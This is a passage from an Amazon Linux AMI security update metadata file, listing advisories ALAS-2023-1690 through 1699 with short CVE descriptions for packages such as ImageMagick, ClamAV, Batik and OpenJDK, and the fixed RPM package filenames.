arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.50.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1690</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1690: important priority package update for ca-certificates</title><issued date="2023-02-17 00:02:00" /><updated date="2023-02-23 01:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23491:
Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi 2022.12.07 removes root certificates from "TrustCor" from the root store. These are in the process of being removed from Mozilla's trust store. TrustCor's root certificates are being removed pursuant to an investigation prompted by media reporting that TrustCor's ownership also operated a business that produced spyware. Conclusions of Mozilla's investigation can be found in the linked google group discussion.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23491" title="" id="CVE-2022-23491" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ca-certificates" version="2018.2.22" release="65.1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/ca-certificates-2018.2.22-65.1.29.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1692</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1692: important priority package update for libconfuse</title><issued date="2023-02-17 00:02:00" /><updated date="2023-02-23 01:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-40320:
cfg_tilde_expand in confuse.c in libConfuse 3.3 has a heap-based buffer over-read.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40320" title="" id="CVE-2022-40320" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libconfuse-devel" version="2.7" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libconfuse-devel-2.7-4.4.amzn1.x86_64.rpm</filename></package><package name="libconfuse-debuginfo" version="2.7" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libconfuse-debuginfo-2.7-4.4.amzn1.x86_64.rpm</filename></package><package name="libconfuse" version="2.7" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libconfuse-2.7-4.4.amzn1.x86_64.rpm</filename></package><package name="libconfuse" version="2.7" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/libconfuse-2.7-4.4.amzn1.i686.rpm</filename></package><package name="libconfuse-debuginfo" version="2.7" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/libconfuse-debuginfo-2.7-4.4.amzn1.i686.rpm</filename></package><package name="libconfuse-devel" version="2.7" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/libconfuse-devel-2.7-4.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1693</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1693: important priority package update for libXpm</title><issued date="2023-02-17 00:02:00" /><updated date="2023-02-23 01:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-4883:
A flaw was found in libXpm. When processing files with .Z or .gz extensions, the library calls external programs to compress and uncompress files, relying on the PATH environment variable to find these programs, which could allow a malicious user to execute other programs by manipulating the PATH environment variable.
CVE-2022-46285:
A flaw was found in libXpm. This issue occurs when parsing a file with a comment not closed; the end-of-file condition will not be detected, leading to an infinite loop and resulting in a Denial of Service in the application linked to the library.
CVE-2022-44617:
A flaw was found in libXpm. When processing a file with width of 0 and a very large height, some parser functions will be called repeatedly and can lead to an infinite loop, resulting in a Denial of Service in the application linked to the library.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44617" title="" id="CVE-2022-44617" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46285" title="" id="CVE-2022-46285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4883" title="" id="CVE-2022-4883" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXpm" version="3.5.10" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-3.5.10-2.10.amzn1.x86_64.rpm</filename></package><package name="libXpm-devel" version="3.5.10" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-devel-3.5.10-2.10.amzn1.x86_64.rpm</filename></package><package name="libXpm-debuginfo" version="3.5.10" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-debuginfo-3.5.10-2.10.amzn1.x86_64.rpm</filename></package><package name="libXpm" version="3.5.10" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-3.5.10-2.10.amzn1.i686.rpm</filename></package><package name="libXpm-devel" version="3.5.10" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-devel-3.5.10-2.10.amzn1.i686.rpm</filename></package><package name="libXpm-debuginfo" version="3.5.10" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-debuginfo-3.5.10-2.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1694</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1694: critical priority package update for clamav</title><issued date="2023-02-20 20:28:00" /><updated date="2023-02-23 01:34:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-20052:
A possible remote information leak vulnerability in the DMG file parser. The issue affects versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier.
CVE-2023-20032:
Possible remote code execution vulnerability in the ClamAV HFS+ file parser. The issue affects ClamAV versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20032" title="" id="CVE-2023-20032" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20052" title="" id="CVE-2023-20052" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-update" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.103.8" release="1.52.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.103.8-1.52.amzn1.noarch.rpm</filename></package><package name="clamav-debuginfo" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamd" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamav-milter" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.103.8" release="1.52.amzn1" epoch="0" 
arch="noarch"><filename>Packages/clamav-filesystem-0.103.8-1.52.amzn1.noarch.rpm</filename></package><package name="clamav-lib" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.103.8-1.52.amzn1.i686.rpm</filename></package><package name="clamav" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.103.8-1.52.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.103.8-1.52.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.103.8-1.52.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.103.8-1.52.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.103.8-1.52.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.103.8-1.52.amzn1.i686.rpm</filename></package><package name="clamd" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.103.8-1.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1695</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1695: important priority package update for batik</title><issued date="2023-03-02 20:21:00" /><updated date="2023-03-07 01:56:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-42890:
A vulnerability in Batik of Apache XML Graphics allows an attacker to run Java code from untrusted SVG via JavaScript. This issue affects Apache XML Graphics prior to 1.16. Users are recommended to upgrade to version 1.16.
CVE-2022-41704:
A vulnerability in Batik of Apache XML Graphics allows an attacker to run untrusted Java code from an SVG. This issue affects Apache XML Graphics prior to 1.16. It is recommended to update to version 1.16.
CVE-2022-40146:
Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to access files using a Jar url. This issue affects Apache XML Graphics Batik 1.14.
CVE-2022-38648:
Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to fetch external resources. This issue affects Apache XML Graphics Batik 1.14.
CVE-2022-38398:
Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to load a URL through the jar protocol. This issue affects Apache XML Graphics Batik 1.14.
CVE-2020-11987:
Apache Batik 1.13 is vulnerable to server-side request forgery, caused by improper input validation by the NodePickerPanel. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11987" title="" id="CVE-2020-11987" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38398" title="" id="CVE-2022-38398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38648" title="" id="CVE-2022-38648" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40146" title="" id="CVE-2022-40146" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41704" title="" id="CVE-2022-41704" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42890" title="" id="CVE-2022-42890" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="batik-demo" version="1.7" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/batik-demo-1.7-10.10.amzn1.x86_64.rpm</filename></package><package name="batik-squiggle" version="1.7" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/batik-squiggle-1.7-10.10.amzn1.x86_64.rpm</filename></package><package name="batik-rasterizer" version="1.7" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/batik-rasterizer-1.7-10.10.amzn1.x86_64.rpm</filename></package><package name="batik-svgpp" version="1.7" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/batik-svgpp-1.7-10.10.amzn1.x86_64.rpm</filename></package><package name="batik-ttf2svg" version="1.7" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/batik-ttf2svg-1.7-10.10.amzn1.x86_64.rpm</filename></package><package name="batik-slideshow" version="1.7" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/batik-slideshow-1.7-10.10.amzn1.x86_64.rpm</filename></package><package name="batik" version="1.7" release="10.10.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/batik-1.7-10.10.amzn1.x86_64.rpm</filename></package><package name="batik-javadoc" version="1.7" release="10.10.amzn1" epoch="0" arch="noarch"><filename>Packages/batik-javadoc-1.7-10.10.amzn1.noarch.rpm</filename></package><package name="batik-squiggle" version="1.7" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/batik-squiggle-1.7-10.10.amzn1.i686.rpm</filename></package><package name="batik-rasterizer" version="1.7" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/batik-rasterizer-1.7-10.10.amzn1.i686.rpm</filename></package><package name="batik-slideshow" version="1.7" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/batik-slideshow-1.7-10.10.amzn1.i686.rpm</filename></package><package name="batik-svgpp" version="1.7" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/batik-svgpp-1.7-10.10.amzn1.i686.rpm</filename></package><package name="batik-ttf2svg" version="1.7" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/batik-ttf2svg-1.7-10.10.amzn1.i686.rpm</filename></package><package name="batik-demo" version="1.7" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/batik-demo-1.7-10.10.amzn1.i686.rpm</filename></package><package name="batik" version="1.7" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/batik-1.7-10.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1696</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1696: medium priority package update for ImageMagick</title><issued date="2023-03-02 20:22:00" /><updated date="2023-03-07 01:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-44268:
ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary file (if the magick binary has permissions to read it).
CVE-2022-44267:
ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input.
CVE-2022-32547:
In ImageMagick, there is a load of a misaligned address for type 'double', which requires 8-byte alignment, and for type 'float', which requires 4-byte alignment, at MagickCore/property.c. Whenever crafted or untrusted input is processed by ImageMagick, this causes a negative impact to application availability or other problems related to undefined behavior.
CVE-2022-32546:
A vulnerability was found in ImageMagick, causing a value outside the range of representable values of type 'unsigned long' at coders/pcl.c, when crafted or untrusted input is processed. This leads to a negative impact to application availability or other problems related to undefined behavior.
CVE-2022-32545:
A vulnerability was found in ImageMagick, causing a value outside the range of representable values of type 'unsigned char' at coders/psd.c, when crafted or untrusted input is processed. This leads to a negative impact to application availability or other problems related to undefined behavior.
CVE-2022-28463:
ImageMagick 7.1.0-27 is vulnerable to Buffer Overflow.
CVE-2021-4219:
A flaw was found in ImageMagick. The vulnerability occurs due to improper use of open functions and leads to a denial of service. This flaw allows an attacker to crash the system.
CVE-2021-3574:
A vulnerability was found in ImageMagick. Memory leaks are detected when executing a crafted file with the convert command, affecting availability.
CVE-2021-20224:
An integer overflow issue was discovered in ImageMagick's ExportIndexQuantum() function in MagickCore/quantum-export.c. Function calls to GetPixelIndex() could result in values outside the range representable by 'unsigned char'. When ImageMagick processes a crafted PDF file, this could lead to undefined behaviour or a crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20224" title="" id="CVE-2021-20224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3574" title="" id="CVE-2021-3574" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4219" title="" id="CVE-2021-4219" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28463" title="" id="CVE-2022-28463" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32545" title="" id="CVE-2022-32545" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32546" title="" id="CVE-2022-32546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32547" title="" id="CVE-2022-32547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44267" title="" id="CVE-2022-44267" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44268" title="" id="CVE-2022-44268" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-c++-devel" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.68-3.24.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.68-3.24.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.68-3.24.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.68-3.24.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" 
version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.68-3.24.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.68-3.24.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.68-3.24.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.68-3.24.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.68-3.24.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.68-3.24.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.68-3.24.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.68-3.24.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.68-3.24.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.68-3.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1697</id><title>Amazon 
Linux AMI 2014.03 - ALAS-2023-1697: medium priority package update for java-1.8.0-openjdk</title><issued date="2023-03-02 20:22:00" /><updated date="2023-03-07 01:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-21843:
Better Banking of Sounds: JARSoundbankReader can load classes from remote URLs.
CVE-2023-21830:
Improve CORBA communication: CORBA deserialization can result in outbound network connections with data passed in.
CVE-2022-21626:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21624:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21624" title="" id="CVE-2022-21624" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21626" title="" id="CVE-2022-21626" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21830" title="" id="CVE-2023-21830" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21843" title="" id="CVE-2023-21843" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-devel" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.362.b08-1.72.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.362.b08-1.72.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.362.b08-1.72.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.362.b08-1.72.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.72.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.362.b08-1.72.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" 
arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.362.b08-1.72.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.362.b08-1.72.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.362.b08-1.72.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.362.b08-1.72.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.362.b08-1.72.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.362.b08-1.72.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.72.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.362.b08-1.72.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1698</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1698: important priority package update for cifs-utils</title><issued date="2023-03-02 20:22:00" /><updated date="2023-03-07 01:56:00" /><severity>important</severity><description>Package updates are available for Amazon 
Linux AMI that fix the following vulnerabilities:
CVE-2022-27239:
A stack-based buffer overflow issue was found in cifs-utils. Parsing the mount.cifs ip command-line argument can lead to local attackers gaining root privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27239" title="" id="CVE-2022-27239" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cifs-utils" version="6.2" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/cifs-utils-6.2-7.7.amzn1.x86_64.rpm</filename></package><package name="cifs-utils-debuginfo" version="6.2" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/cifs-utils-debuginfo-6.2-7.7.amzn1.x86_64.rpm</filename></package><package name="cifs-utils-devel" version="6.2" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/cifs-utils-devel-6.2-7.7.amzn1.x86_64.rpm</filename></package><package name="cifs-utils-debuginfo" version="6.2" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/cifs-utils-debuginfo-6.2-7.7.amzn1.i686.rpm</filename></package><package name="cifs-utils-devel" version="6.2" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/cifs-utils-devel-6.2-7.7.amzn1.i686.rpm</filename></package><package name="cifs-utils" version="6.2" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/cifs-utils-6.2-7.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1699</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1699: medium priority package update for freeradius</title><issued date="2023-03-02 20:22:00" /><updated date="2023-03-07 01:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-41860:
When an EAP-SIM supplicant sends an unknown SIM option, the server will try to look that option up in the internal dictionaries. This lookup will fail, but the SIM code will not check for that failure. Instead, it will dereference a NULL pointer, and cause the server to crash.
